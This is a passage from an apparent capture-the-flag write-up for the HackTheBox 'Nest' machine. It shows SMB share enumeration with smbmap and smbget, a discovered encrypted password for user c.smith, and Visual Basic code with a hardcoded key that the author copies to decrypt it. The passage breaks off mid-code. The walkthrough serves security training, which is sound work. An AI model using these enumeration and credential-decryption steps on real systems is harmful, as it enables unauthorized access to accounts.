dr--r--r-- 0 Wed Aug 7 19:08:12 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 19:08:12 2019 ..
dr--r--r-- 0 Wed Aug 7 15:40:25 2019 Finance
dr--r--r-- 0 Wed Aug 7 19:08:12 2019 HR
dr--r--r-- 0 Thu Aug 8 06:59:25 2019 IT
<span class="nb">.</span>
dr--r--r-- 0 Sat Jan 25 18:04:21 2020 <span class="nb">.</span>
dr--r--r-- 0 Sat Jan 25 18:04:21 2020 ..
dr--r--r-- 0 Fri Aug 9 11:08:23 2019 Administrator
dr--r--r-- 0 Sun Jan 26 02:21:44 2020 C.Smith
dr--r--r-- 0 Thu Aug 8 13:03:29 2019 L.Frost
dr--r--r-- 0 Thu Aug 8 13:02:56 2019 R.Thompson
dr--r--r-- 0 Wed Aug 7 18:56:02 2019 TempUser
Users READ ONLY
.<span class="se">\</span>
dr--r--r-- 0 Sat Jan 25 18:04:21 2020 <span class="nb">.</span>
dr--r--r-- 0 Sat Jan 25 18:04:21 2020 ..
dr--r--r-- 0 Fri Aug 9 11:08:23 2019 Administrator
dr--r--r-- 0 Sun Jan 26 02:21:44 2020 C.Smith
dr--r--r-- 0 Thu Aug 8 13:03:29 2019 L.Frost
dr--r--r-- 0 Thu Aug 8 13:02:56 2019 R.Thompson
dr--r--r-- 0 Wed Aug 7 18:56:02 2019 TempUser
.<span class="se">\T</span>empUser<span class="se">\</span>
dr--r--r-- 0 Wed Aug 7 18:56:02 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 18:56:02 2019 ..
<span class="nt">-r--r--r--</span> 0 Wed Aug 7 18:56:02 2019 New Text Document.txt</code></pre></figure>
<p>Downloading everything again:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span>smbget <span class="nt">-R</span> smb://10.10.10.178/Data/IT/ <span class="nt">-U</span> TempUser
Password <span class="k">for</span> <span class="o">[</span>TempUser] connecting to //Data/10.10.10.178:
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Data/IT//Configs/Adobe/editing.xml
smb://10.10.10.178/Data/IT//Configs/Adobe/Options.txt
smb://10.10.10.178/Data/IT//Configs/Adobe/projects.xml
smb://10.10.10.178/Data/IT//Configs/Adobe/settings.xml
smb://10.10.10.178/Data/IT//Configs/Atlas/Temp.XML
smb://10.10.10.178/Data/IT//Configs/Microsoft/Options.xml
smb://10.10.10.178/Data/IT//Configs/NotepadPlusPlus/config.xml
smb://10.10.10.178/Data/IT//Configs/NotepadPlusPlus/shortcuts.xml
smb://10.10.10.178/Data/IT//Configs/RU Scanner/RU_config.xml </code></pre></figure>
<p>If we look inside the files we can see some hashed password on RU_config.xml</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span><span class="nb">cat </span>Configs/RU<span class="se">\ </span>Scanner/RU_config.xml
<?xml <span class="nv">version</span><span class="o">=</span><span class="s2">"1.0"</span>?>
<ConfigFile xmlns:xsi<span class="o">=</span><span class="s2">"http://www.w3.org/2001/XMLSchema-instance"</span> xmlns:xsd<span class="o">=</span><span class="s2">"http://www.w3.org/2001/XMLSchema"</span><span class="o">></span>
<Port>389</Port>
<Username>c.smith</Username>
<Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE<span class="o">=</span></Password>
</ConfigFile></code></pre></figure>
<p>Looking the other files we find some other interesting things:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span><span class="nb">tail </span>Configs/NotepadPlusPlus/config.xml
<Find <span class="nv">name</span><span class="o">=</span><span class="s2">"redeem on"</span> />
<Find <span class="nv">name</span><span class="o">=</span><span class="s2">"192"</span> />
<Replace <span class="nv">name</span><span class="o">=</span><span class="s2">"C_addEvent"</span> />
</FindHistory>
<History <span class="nv">nbMaxFile</span><span class="o">=</span><span class="s2">"15"</span> <span class="nv">inSubMenu</span><span class="o">=</span><span class="s2">"no"</span> <span class="nv">customLength</span><span class="o">=</span><span class="s2">"-1"</span><span class="o">></span>
<File <span class="nv">filename</span><span class="o">=</span><span class="s2">"C:</span><span class="se">\w</span><span class="s2">indows</span><span class="se">\S</span><span class="s2">ystem32</span><span class="se">\d</span><span class="s2">rivers</span><span class="se">\e</span><span class="s2">tc</span><span class="se">\h</span><span class="s2">osts"</span> />
<File <span class="nv">filename</span><span class="o">=</span><span class="s2">"</span><span class="se">\\</span><span class="s2">HTB-NEST</span><span class="se">\S</span><span class="s2">ecure</span><span class="nv">$\</span><span class="s2">IT</span><span class="se">\C</span><span class="s2">arl</span><span class="se">\T</span><span class="s2">emp.txt"</span> />
<File <span class="nv">filename</span><span class="o">=</span><span class="s2">"C:</span><span class="se">\U</span><span class="s2">sers</span><span class="se">\C</span><span class="s2">.Smith</span><span class="se">\D</span><span class="s2">esktop</span><span class="se">\t</span><span class="s2">odo.txt"</span> />
</History>
</NotepadPlus></code></pre></figure>
<p>Checking Temp.xml</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span><span class="nb">cat </span>Configs/Atlas/Temp.XML
<?xml <span class="nv">version</span><span class="o">=</span><span class="s2">"1.0"</span> <span class="nv">encoding</span><span class="o">=</span><span class="s2">"UTF-8"</span>?>
<bs:Brainstorm xmlns:bs<span class="o">=</span><span class="s2">"http://schemas.microsoft.com/visio/2003/brainstorming"</span><span class="o">></span><bs:topic bs:TopicID<span class="o">=</span><span class="s2">"T1"</span><span class="o">></span><bs:text>Marketing Plan</bs:text><bs:topic bs:TopicID<span class="o">=</span><span class="s2">"T1.1"</span><span class="o">></span><bs:text>Product</bs:text><bs:prop><bs:id>1</bs:id><bs:label>Assigned to</bs:label><bs:value>Deanna Meyer</bs:value></bs:prop><bs:topic bs:TopicID<span class="o">=</span><span class="s2">"T1.1.1"</span><span class="o">></span><bs:text>New features</bs:text></bs:topic><bs:topic bs:TopicID<span class="o">=</span><span class="s2">"T1.1.2"</span><span class="o">></span><bs:text>Competitive strengths</bs:text></bs:topic><bs:topic bs:TopicID<span class="o">=</span><span class="s2">"T1.1.3"</span><span class="o">></span><bs:text>Competitive weaknesses</bs:text></bs:topic></bs:topic><bs:topic bs:TopicID<span class="o">=</span><span class="s2">"T1.2"</span><span class="o">></span><bs:text>Placement</bs:text><bs:prop><bs:id>1</bs:id><bs:label>Assigned to</bs:label><bs:value>Jolie Lenehan</bs:value></bs:prop></bs:topic><bs:topic bs:TopicID<span class="o">=</span><span class="s2">"T1.3"</span><span class="o">></span><bs:text>Price</bs:text><bs:prop><bs:id>1</bs:id><bs:label>Assigned to</bs:label><bs:value>Robert O<span class="s1">'Hara</bs:value></bs:prop></bs:topic><bs:topic bs:TopicID="T1.4"><bs:text>Promotion</bs:text><bs:prop><bs:id>1</bs:id><bs:label>Assigned to</bs:label><bs:value>Robert O'</span>Hara</bs:value></bs:prop><bs:topic bs:TopicID<span class="o">=</span><span class="s2">"T1.4.1"</span><span class="o">></span><bs:text>Advertising</bs:text></bs:topic><bs:topic bs:TopicID<span class="o">=</span><span class="s2">"T1.4.2"</span><span class="o">></span><bs:text>Mailings</bs:text></bs:topic><bs:topic bs:TopicID<span class="o">=</span><span class="s2">"T1.4.3"</span><span class="o">></span><bs:text>Trade shows</bs:text></bs:topic></bs:topic></bs:topic><bs:association bs:topic1<span class="o">=</span><span class="s2">"T1.4"</span> bs:topic2<span class="o">=</span><span class="s2">"T1.3"</span>/></bs:Brainstorm></code></pre></figure>
<p>Some possible names for users. As we know the Secure$ path from recent files let’s try to dig into it directly:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span>smbmap <span class="nt">-H</span> 10.10.10.178 <span class="nt">-R</span> Secure<span class="nv">$/</span>IT/Carl <span class="nt">--depth</span> 10 <span class="nt">-p</span> welcome2019 <span class="nt">-u</span> TempUser
<span class="o">[</span>+] Finding open SMB ports....
<span class="o">[</span>+] User SMB session established on 10.10.10.178...
<span class="o">[</span>+] IP: 10.10.10.178:445 Name: 10.10.10.178
Disk Permissions Comment
<span class="nt">----</span> <span class="nt">-----------</span> <span class="nt">-------</span>
<span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 19:08:12 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 19:08:12 2019 ..
dr--r--r-- 0 Wed Aug 7 15:40:25 2019 Finance
dr--r--r-- 0 Wed Aug 7 19:08:12 2019 HR
dr--r--r-- 0 Thu Aug 8 06:59:25 2019 IT
Secure<span class="nv">$ </span> READ ONLY
.IT<span class="se">\C</span>arl<span class="se">\</span>
dr--r--r-- 0 Wed Aug 7 15:42:14 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 15:42:14 2019 ..
dr--r--r-- 0 Wed Aug 7 15:44:00 2019 Docs
dr--r--r-- 0 Tue Aug 6 09:45:47 2019 Reports
dr--r--r-- 0 Tue Aug 6 10:41:55 2019 VB Projects
.IT<span class="se">\C</span>arl<span class="se">\D</span>ocs<span class="se">\</span>
dr--r--r-- 0 Wed Aug 7 15:44:00 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 15:44:00 2019 ..
<span class="nt">-r--r--r--</span> 56 Wed Aug 7 15:44:16 2019 ip.txt
<span class="nt">-r--r--r--</span> 73 Wed Aug 7 15:43:46 2019 mmc.txt
.IT<span class="se">\C</span>arl<span class="se">\V</span>B Projects<span class="se">\</span>
dr--r--r-- 0 Tue Aug 6 10:41:55 2019 <span class="nb">.</span>
dr--r--r-- 0 Tue Aug 6 10:41:55 2019 ..
dr--r--r-- 0 Tue Aug 6 10:41:53 2019 Production
dr--r--r-- 0 Tue Aug 6 10:47:41 2019 WIP
.IT<span class="se">\C</span>arl<span class="se">\V</span>B Projects<span class="se">\W</span>IP<span class="se">\</span>
dr--r--r-- 0 Tue Aug 6 10:47:41 2019 <span class="nb">.</span>
dr--r--r-- 0 Tue Aug 6 10:47:41 2019 ..
dr--r--r-- 0 Fri Aug 9 11:36:45 2019 RU
.IT<span class="se">\C</span>arl<span class="se">\V</span>B Projects<span class="se">\W</span>IP<span class="se">\R</span>U<span class="se">\</span>
dr--r--r-- 0 Fri Aug 9 11:36:45 2019 <span class="nb">.</span>
dr--r--r-- 0 Fri Aug 9 11:36:45 2019 ..
dr--r--r-- 0 Wed Aug 7 18:05:54 2019 RUScanner
<span class="nt">-r--r--r--</span> 871 Fri Aug 9 11:36:35 2019 RUScanner.sln
.IT<span class="se">\C</span>arl<span class="se">\V</span>B Projects<span class="se">\W</span>IP<span class="se">\R</span>U<span class="se">\R</span>UScanner<span class="se">\</span>
dr--r--r-- 0 Wed Aug 7 18:05:54 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 18:05:54 2019 ..
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 bin
<span class="nt">-r--r--r--</span> 772 Wed Aug 7 18:05:09 2019 ConfigFile.vb
<span class="nt">-r--r--r--</span> 279 Wed Aug 7 18:05:44 2019 Module1.vb
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 My Project
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 obj
<span class="nt">-r--r--r--</span> 4828 Fri Aug 9 11:38:30 2019 RU Scanner.vbproj
<span class="nt">-r--r--r--</span> 143 Wed Aug 7 16:00:28 2019 RU Scanner.vbproj.user
<span class="nt">-r--r--r--</span> 133 Wed Aug 7 18:05:58 2019 SsoIntegration.vb
<span class="nt">-r--r--r--</span> 4888 Wed Aug 7 18:06:03 2019 Utils.vb
.IT<span class="se">\C</span>arl<span class="se">\V</span>B Projects<span class="se">\W</span>IP<span class="se">\R</span>U<span class="se">\R</span>UScanner<span class="se">\b</span><span class="k">in</span><span class="se">\</span>
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 ..
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 Debug
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 Release
.IT<span class="se">\C</span>arl<span class="se">\V</span>B Projects<span class="se">\W</span>IP<span class="se">\R</span>U<span class="se">\R</span>UScanner<span class="se">\M</span>y Project<span class="se">\</span>
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 ..
<span class="nt">-r--r--r--</span> 441 Wed Aug 7 16:00:11 2019 Application.Designer.vb
<span class="nt">-r--r--r--</span> 481 Wed Aug 7 16:00:11 2019 Application.myapp
<span class="nt">-r--r--r--</span> 1163 Wed Aug 7 16:00:11 2019 AssemblyInfo.vb
<span class="nt">-r--r--r--</span> 2776 Wed Aug 7 16:00:11 2019 Resources.Designer.vb
<span class="nt">-r--r--r--</span> 5612 Wed Aug 7 16:00:11 2019 Resources.resx
<span class="nt">-r--r--r--</span> 2989 Wed Aug 7 16:00:11 2019 Settings.Designer.vb
<span class="nt">-r--r--r--</span> 279 Wed Aug 7 16:00:11 2019 Settings.settings
.IT<span class="se">\C</span>arl<span class="se">\V</span>B Projects<span class="se">\W</span>IP<span class="se">\R</span>U<span class="se">\R</span>UScanner<span class="se">\o</span>bj<span class="se">\</span>
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 ..
dr--r--r-- 0 Wed Aug 7 16:00:11 2019 x86</code></pre></figure>
<p>Tons of files there let’s download them:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span>smbget <span class="nt">-R</span> smb://10.10.10.178/Secure<span class="nv">$/</span>IT/Carl/ <span class="nt">-U</span> TempUser
Password <span class="k">for</span> <span class="o">[</span>TempUser] connecting to //Secure<span class="nv">$/</span>10.10.10.178:
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Secure<span class="nv">$/</span>IT/Carl//Docs/ip.txt
smb://10.10.10.178/Secure<span class="nv">$/</span>IT/Carl//Docs/mmc.txt
smb://10.10.10.178/Secure<span class="nv">$/</span>IT/Carl//VB Projects/WIP/RU/RUScanner/ConfigFile.vb
smb://10.10.10.178/Secure<span class="nv">$/</span>IT/Carl//VB Projects/WIP/RU/RUScanner/Module1.vb
smb://10.10.10.178/Secure<span class="nv">$/</span>IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb
smb://10.10.10.178/Secure<span class="nv">$/</span>IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.myapp
smb://10.10.10.178/Secure<span class="nv">$/</span>IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb
smb://10.10.10.178/Secure<span class="nv">$/</span>IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb
smb://10.10.10.178/Secure<span class="nv">$/</span>IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.resx
smb://10.10.10.178/Secure<span class="nv">$/</span>IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb
smb://10.10.10.178/Secure<span class="nv">$/</span>IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.settings
smb://10.10.10.178/Secure<span class="nv">$/</span>IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj
smb://10.10.10.178/Secure<span class="nv">$/</span>IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user
smb://10.10.10.178/Secure<span class="nv">$/</span>IT/Carl//VB Projects/WIP/RU/RUScanner/SsoIntegration.vb
smb://10.10.10.178/Secure<span class="nv">$/</span>IT/Carl//VB Projects/WIP/RU/RUScanner/Utils.vb
smb://10.10.10.178/Secure<span class="nv">$/</span>IT/Carl//VB Projects/WIP/RU/RUScanner.sln
Downloaded 25.18kB <span class="k">in </span>39 seconds</code></pre></figure>
<p>Checking their content we see:</p>
<figure class="highlight"><pre><code class="language-vb" data-lang="vb"><span class="err">$</span> <span class="n">cat</span> <span class="n">VB</span><span class="o">\</span> <span class="n">Projects</span><span class="o">/</span><span class="n">WIP</span><span class="o">/</span><span class="n">RU</span><span class="o">/</span><span class="n">RUScanner</span><span class="o">/</span><span class="n">Module1</span><span class="p">.</span><span class="n">vb</span>
<span class="k">Module</span> <span class="nn">Module1</span>
<span class="k">Sub</span> <span class="nf">Main</span><span class="p">()</span>
<span class="k">Dim</span> <span class="nv">Config</span> <span class="ow">As</span> <span class="n">ConfigFile</span> <span class="o">=</span> <span class="n">ConfigFile</span><span class="p">.</span><span class="n">LoadFromFile</span><span class="p">(</span><span class="s">"RU_Config.xml"</span><span class="p">)</span>
<span class="k">Dim</span> <span class="nv">test</span> <span class="ow">As</span> <span class="k">New</span> <span class="n">SsoIntegration</span> <span class="k">With</span> <span class="p">{.</span><span class="n">Username</span> <span class="o">=</span> <span class="n">Config</span><span class="p">.</span><span class="n">Username</span><span class="p">,</span> <span class="p">.</span><span class="n">Password</span> <span class="o">=</span> <span class="n">Utils</span><span class="p">.</span><span class="n">DecryptString</span><span class="p">(</span><span class="n">Config</span><span class="p">.</span><span class="n">Password</span><span class="p">)}</span>
<span class="k">End</span> <span class="k">Sub</span>
<span class="k">End</span> <span class="k">Module</span></code></pre></figure>
<p>So this seems to point it uses the RU_Config.xml we found, maybe the algo to decrypt is here. Utils.vb seems to have something related to this. Taking a closer look on utils.decrypt</p>
<figure class="highlight"><pre><code class="language-vb" data-lang="vb"> <span class="k">Public</span> <span class="k">Shared</span> <span class="k">Function</span> <span class="nf">DecryptString</span><span class="p">(</span><span class="n">EncryptedString</span> <span class="ow">As</span> <span class="kt">String</span><span class="p">)</span> <span class="ow">As</span> <span class="kt">String</span>
<span class="k">If</span> <span class="kt">String</span><span class="p">.</span><span class="n">IsNullOrEmpty</span><span class="p">(</span><span class="n">EncryptedString</span><span class="p">)</span> <span class="k">Then</span>
<span class="k">Return</span> <span class="kt">String</span><span class="p">.</span><span class="n">Empty</span>
<span class="k">Else</span>
<span class="k">Return</span> <span class="n">Decrypt</span><span class="p">(</span><span class="n">EncryptedString</span><span class="p">,</span> <span class="s">"N3st22"</span><span class="p">,</span> <span class="s">"88552299"</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="s">"464R5DFA5DL6LE28"</span><span class="p">,</span> <span class="mi">256</span><span class="p">)</span>
<span class="k">End</span> <span class="k">If</span>
<span class="k">End</span> <span class="k">Function</span>
<span class="k">Public</span> <span class="k">Shared</span> <span class="k">Function</span> <span class="nf">Decrypt</span><span class="p">(</span><span class="k">ByVal</span> <span class="n">cipherText</span> <span class="ow">As</span> <span class="kt">String</span><span class="p">,</span> <span class="n">_</span>
<span class="k">ByVal</span> <span class="n">passPhrase</span> <span class="ow">As</span> <span class="kt">String</span><span class="p">,</span> <span class="n">_</span>
<span class="k">ByVal</span> <span class="n">saltValue</span> <span class="ow">As</span> <span class="kt">String</span><span class="p">,</span> <span class="n">_</span>
<span class="k">ByVal</span> <span class="n">passwordIterations</span> <span class="ow">As</span> <span class="kt">Integer</span><span class="p">,</span> <span class="n">_</span>
<span class="k">ByVal</span> <span class="n">initVector</span> <span class="ow">As</span> <span class="kt">String</span><span class="p">,</span> <span class="n">_</span>
<span class="k">ByVal</span> <span class="n">keySize</span> <span class="ow">As</span> <span class="kt">Integer</span><span class="p">)</span> <span class="n">_</span>
<span class="ow">As</span> <span class="kt">String</span>
<span class="k">Dim</span> <span class="nv">initVectorBytes</span> <span class="ow">As</span> <span class="kt">Byte</span><span class="p">()</span>
<span class="n">initVectorBytes</span> <span class="o">=</span> <span class="n">Encoding</span><span class="p">.</span><span class="n">ASCII</span><span class="p">.</span><span class="n">GetBytes</span><span class="p">(</span><span class="n">initVector</span><span class="p">)</span>
<span class="k">Dim</span> <span class="nv">saltValueBytes</span> <span class="ow">As</span> <span class="kt">Byte</span><span class="p">()</span>
<span class="n">saltValueBytes</span> <span class="o">=</span> <span class="n">Encoding</span><span class="p">.</span><span class="n">ASCII</span><span class="p">.</span><span class="n">GetBytes</span><span class="p">(</span><span class="n">saltValue</span><span class="p">)</span>
<span class="k">Dim</span> <span class="nv">cipherTextBytes</span> <span class="ow">As</span> <span class="kt">Byte</span><span class="p">()</span>
<span class="n">cipherTextBytes</span> <span class="o">=</span> <span class="n">Convert</span><span class="p">.</span><span class="n">FromBase64String</span><span class="p">(</span><span class="n">cipherText</span><span class="p">)</span>
<span class="k">Dim</span> <span class="nv">password</span> <span class="ow">As</span> <span class="k">New</span> <span class="n">Rfc2898DeriveBytes</span><span class="p">(</span><span class="n">passPhrase</span><span class="p">,</span> <span class="n">_</span>
<span class="n">saltValueBytes</span><span class="p">,</span> <span class="n">_</span>
<span class="n">passwordIterations</span><span class="p">)</span>
<span class="k">Dim</span> <span class="nv">keyBytes</span> <span class="ow">As</span> <span class="kt">Byte</span><span class="p">()</span>
<span class="n">keyBytes</span> <span class="o">=</span> <span class="n">password</span><span class="p">.</span><span class="n">GetBytes</span><span class="p">(</span><span class="k">CInt</span><span class="p">(</span><span class="n">keySize</span> <span class="o">/</span> <span class="mi">8</span><span class="p">))</span>
<span class="k">Dim</span> <span class="nv">symmetricKey</span> <span class="ow">As</span> <span class="k">New</span> <span class="n">AesCryptoServiceProvider</span>
<span class="n">symmetricKey</span><span class="p">.</span><span class="n">Mode</span> <span class="o">=</span> <span class="n">CipherMode</span><span class="p">.</span><span class="n">CBC</span>
<span class="k">Dim</span> <span class="nv">decryptor</span> <span class="ow">As</span> <span class="n">ICryptoTransform</span>
<span class="n">decryptor</span> <span class="o">=</span> <span class="n">symmetricKey</span><span class="p">.</span><span class="n">CreateDecryptor</span><span class="p">(</span><span class="n">keyBytes</span><span class="p">,</span> <span class="n">initVectorBytes</span><span class="p">)</span>
<span class="k">Dim</span> <span class="nv">memoryStream</span> <span class="ow">As</span> <span class="n">IO</span><span class="p">.</span><span class="n">MemoryStream</span>
<span class="n">memoryStream</span> <span class="o">=</span> <span class="k">New</span> <span class="n">IO</span><span class="p">.</span><span class="n">MemoryStream</span><span class="p">(</span><span class="n">cipherTextBytes</span><span class="p">)</span>
<span class="k">Dim</span> <span class="nv">cryptoStream</span> <span class="ow">As</span> <span class="n">CryptoStream</span>
<span class="n">cryptoStream</span> <span class="o">=</span> <span class="k">New</span> <span class="n">CryptoStream</span><span class="p">(</span><span class="n">memoryStream</span><span class="p">,</span> <span class="n">_</span>
<span class="n">decryptor</span><span class="p">,</span> <span class="n">_</span>
<span class="n">CryptoStreamMode</span><span class="p">.</span><span class="n">Read</span><span class="p">)</span>
<span class="k">Dim</span> <span class="nv">plainTextBytes</span> <span class="ow">As</span> <span class="kt">Byte</span><span class="p">()</span>
<span class="k">ReDim</span> <span class="n">plainTextBytes</span><span class="p">(</span><span class="n">cipherTextBytes</span><span class="p">.</span><span class="n">Length</span><span class="p">)</span>
<span class="k">Dim</span> <span class="nv">decryptedByteCount</span> <span class="ow">As</span> <span class="kt">Integer</span>
<span class="n">decryptedByteCount</span> <span class="o">=</span> <span class="n">cryptoStream</span><span class="p">.</span><span class="n">Read</span><span class="p">(</span><span class="n">plainTextBytes</span><span class="p">,</span> <span class="n">_</span>
<span class="mi">0</span><span class="p">,</span> <span class="n">_</span>
<span class="n">plainTextBytes</span><span class="p">.</span><span class="n">Length</span><span class="p">)</span>
<span class="n">memoryStream</span><span class="p">.</span><span class="n">Close</span><span class="p">()</span>
<span class="n">cryptoStream</span><span class="p">.</span><span class="n">Close</span><span class="p">()</span>
<span class="k">Dim</span> <span class="nv">plainText</span> <span class="ow">As</span> <span class="kt">String</span>
<span class="n">plainText</span> <span class="o">=</span> <span class="n">Encoding</span><span class="p">.</span><span class="n">ASCII</span><span class="p">.</span><span class="n">GetString</span><span class="p">(</span><span class="n">plainTextBytes</span><span class="p">,</span> <span class="n">_</span>
<span class="mi">0</span><span class="p">,</span> <span class="n">_</span>
<span class="n">decryptedByteCount</span><span class="p">)</span>
<span class="k">Return</span> <span class="n">plainText</span>
<span class="k">End</span> <span class="k">Function</span></code></pre></figure>
<p>This seems to be the related password. If we use this to build our own vb file.</p>
<figure class="highlight"><pre><code class="language-vb" data-lang="vb"><span class="k">Imports</span> <span class="nn">System</span>
<span class="k">Imports</span> <span class="nn">System.Text</span>
<span class="k">Imports</span> <span class="nn">System.Security.Cryptography</span>
<span class="k">Public</span> <span class="k">Module</span> <span class="nn">Module1</span>
<span class="k">Public</span> <span class="k">Function</span> <span class="nf">DecryptString</span><span class="p">(</span><span class="n">EncryptedString</span> <span class="ow">As</span> <span class="kt">String</span><span class="p">)</span> <span class="ow">As</span> <span class="kt">String</span>
<span class="k">If</span> <span class="kt">String</span><span class="p">.</span><span class="n">IsNullOrEmpty</span><span class="p">(</span><span class="n">EncryptedString</span><span class="p">)</span> <span class="k">Then</span>
<span class="k">Return</span> <span class="kt">String</span><span class="p">.</span><span class="n">Empty</span>
<span class="k">Else</span>
<span class="k">Return</span> <span class="n">Decrypt</span><span class="p">(</span><span class="n">EncryptedString</span><span class="p">,</span> <span class="s">"N3st22"</span><span class="p">,</span> <span class="s">"88552299"</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="s">"464R5DFA5DL6LE28"</span><span class="p">,</span> <span class="mi">256</span><span class="p">)</span>
<span class="k">End</span> <span class="k">If</span>
<span class="k">End</span> <span class="k">Function</span>
<span class="k">Public</span> <span class="k">Function</span> <span class="nf">Decrypt</span><span class="p">(</span><span class="k">ByVal</span> <span class="n">cipherText</span> <span class="ow">As</span> <span class="kt">String</span><span class="p">,</span> <span class="n">_</span>
<span class="k">ByVal</span> <span class="n">passPhrase</span> <span class="ow">As</span> <span class="kt">String</span><span class="p">,</span> <span class="n">_</span>
<span class="k">ByVal</span> <span class="n">saltValue</span> <span class="ow">As</span> <span class="kt">String</span><span class="p">,</span> <span class="n">_</span>
<span class="k">ByVal</span> <span class="n">passwordIterations</span> <span class="ow">As</span> <span class="kt">Integer</span><span class="p">,</span> <span class="n">_</span>
<span class="k">ByVal</span> <span class="n">initVector</span> <span class="ow">As</span> <span class="kt">String</span><span class="p">,</span> <span class="n">_</span>
<span class="k">ByVal</span> <span class="n">keySize</span> <span class="ow">As</span> <span class="kt">Integer</span><span class="p">)</span> <span class="n">_</span>
<span class="ow">As</span> <span class="kt">String</span>
<span class="k">Dim</span> <span class="nv">initVectorBytes</span> <span class="ow">As</span> <span class="kt">Byte</span><span class="p">()</span>
<span class="n">initVectorBytes</span> <span class="o">=</span> <span class="n">Encoding</span><span class="p">.</span><span class="n">ASCII</span><span class="p">.</span><span class="n">GetBytes</span><span class="p">(</span><span class="n">initVector</span><span class="p">)</span>
<span class="k">Dim</span> <span class="nv">saltValueBytes</span> <span class="ow">As</span> <span class="kt">Byte</span><span class="p">()</span>
<span class="n">saltValueBytes</span> <span class="o">=</span> <span class="n">Encoding</span><span class="p">.</span><span class="n">ASCII</span><span class="p">.</span><span class="n">GetBytes</span><span class="p">(</span><span class="n">saltValue</span><span class="p">)</span>
<span class="k">Dim</span> <span class="nv">cipherTextBytes</span> <span class="ow">As</span> <span class="kt">Byte</span><span class="p">()</span>
<span class="n">cipherTextBytes</span> <span class="o">=</span> <span class="n">Convert</span><span class="p">.</span><span class="n">FromBase64String</span><span class="p">(</span><span class="n">cipherText</span><span class="p">)</span>
<span class="k">Dim</span> <span class="nv">password</span> <span class="ow">As</span> <span class="k">New</span> <span class="n">Rfc2898DeriveBytes</span><span class="p">(</span><span class="n">passPhrase</span><span class="p">,</span> <span class="n">_</span>
<span class="n">saltValueBytes</span><span class="p">,</span> <span class="n">_</span>
<span class="n">passwordIterations</span><span class="p">)</span>
<span class="k">Dim</span> <span class="nv">keyBytes</span> <span class="ow">As</span> <span class="kt">Byte</span><span class="p">()</span>
<span class="n">keyBytes</span> <span class="o">=</span> <span class="n">password</span><span class="p">.</span><span class="n">GetBytes</span><span class="p">(</span><span class="k">CInt</span><span class="p">(</span><span class="n">keySize</span> <span class="o">/</span> <span class="mi">8</span><span class="p">))</span>
<span class="k">Dim</span> <span class="nv">symmetricKey</span> <span class="ow">As</span> <span class="k">New</span> <span class="n">AesCryptoServiceProvider</span>
<span class="n">symmetricKey</span><span class="p">.</span><span class="n">Mode</span> <span class="o">=</span> <span class="n">CipherMode</span><span class="p">.</span><span class="n">CBC</span>
<span class="k">Dim</span> <span class="nv">decryptor</span> <span class="ow">As</span> <span class="n">ICryptoTransform</span>
<span class="n">decryptor</span> <span class="o">=</span> <span class="n">symmetricKey</span><span class="p">.</span><span class="n">CreateDecryptor</span><span class="p">(</span><span class="n">keyBytes</span><span class="p">,</span> <span class="n">initVectorBytes</span><span class="p">)</span>
<span class="k">Dim</span> <span class="nv">memoryStream</span> <span class="ow">As</span> <span class="n">IO</span><span class="p">.</span><span class="n">MemoryStream</span>
<span class="n">memoryStream</span> <span class="o">=</span> <span class="k">New</span> <span class="n">IO</span><span class="p">.</span><span class="n">MemoryStream</span><span class="p">(</span><span class="n">cipherTextBytes</span><span class="p">)</span>
<span class="k">Dim</span> <span class="nv">cryptoStream</span> <span class="ow">As</span> <span class="n">CryptoStream</span>
<span class="n">cryptoStream</span> <span class="o">=</span> <span class="k">New</span> <span class="n">CryptoStream</span><span class="p">(</span><span class="n">memoryStream</span><span class="p">,</span> <span class="n">_</span>
<span class="n">decryptor</span><span class="p">,</span> <span class="n">_</span>
<span class="n">CryptoStreamMode</span><span class="p">.</span><span class="n">Read</span><span class="p">)</span>
<span class="k">Dim</span> <span class="nv">plainTextBytes</span> <span class="ow">As</span> <span class="kt">Byte</span><span class="p">()</span>
<span class="k">ReDim</span> <span class="n">plainTextBytes</span><span class="p">(</span><span class="n">cipherTextBytes</span><span class="p">.</span><span class="n">Length</span><span class="p">)</span>
